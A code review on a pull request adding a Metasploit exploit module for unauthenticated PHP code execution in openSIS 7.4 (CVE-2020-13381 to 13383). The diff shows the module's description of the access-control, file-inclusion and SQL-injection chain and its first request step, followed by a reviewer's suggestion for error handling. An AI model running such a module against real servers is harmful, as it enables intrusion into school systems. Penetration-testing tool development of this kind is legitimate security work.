modules/exploits/unix/webapp/opensis_chain_exec.rb

```diff
@@ -0,0 +1,116 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'openSIS Unauthenticated PHP Code Execution',
+      'Description'    => %q{
+        This module exploits multiple vulnerabilities in openSIS 7.4 and prior versions
+        which could be abused by unauthenticated attackers to execute arbitrary PHP code
+        with the permissions of the webserver. The exploit chain abuses an incorrect access
+        control issue which allows access to scripts which should require the user to be
+        authenticated, and a Local File Inclusion to reach a SQL injection vulnerability which
+        results in execution of arbitrary PHP code due to an unsafe use of the eval() function.
+      },
+      'Author'         => 'EgiX',
+      'License'        => MSF_LICENSE,
+      'References'     =>
+        [
+          ['URL', 'http://karmainsecurity.com/KIS-2020-06'],
+          ['URL', 'http://karmainsecurity.com/KIS-2020-07'],
+          ['URL', 'http://karmainsecurity.com/KIS-2020-08'],
+          ['CVE', '2020-13381'],
+          ['CVE', '2020-13382'],
+          ['CVE', '2020-13383']
+        ],
+      'Privileged'     => false,
+      'Platform'       => ['php'],
+      'Arch'           => ARCH_PHP,
+      'Targets'        => [ ['openSIS <= 7.4', {}] ],
+      'DefaultTarget'  => 0,
+      'DisclosureDate' => 'Jun 30 2020'
+      ))
+
+      register_options(
+        [
+          OptString.new('TARGETURI', [true, "The base path to the web application", "/"])
+        ])
+  end
+
+  def exec_php(php_code)
+    print_status("Retrieving session cookies")
+
+    res = send_request_cgi({
+      'method'    => 'GET',
+      'uri'       => normalize_uri(target_uri.path)
+    })
+
+    unless res && res.code == 200 && res.body && res.get_cookies
+      fail_with(Failure::NoAccess, "Failed to retrieve session cookies")
+    end
+
+    session = res.get_cookies
```

Comment:
Some more granular error handling would be nice.

Ie,

```suggestion
    unless res
      fail_with(Failure::Unreachable, 'Connection failed')
    end

    session = res.get_cookies

    unless res.code == 200 && res.body && session
      fail_with(Failure::NoAccess, 'Failed to retrieve session cookies')
    end
```

And perhaps some validation to ensure that the cookies make sense for OpenSIS (`PHPSESSID` ?). Otherwise these checks are going to be successful on any HTTP server that happens to return 200 OK and a cookie when accessing `TARGETURI` (the web root `/` by default), which is going to be rather confusing if exploitation fails later on in the module as there's no more validation after this point.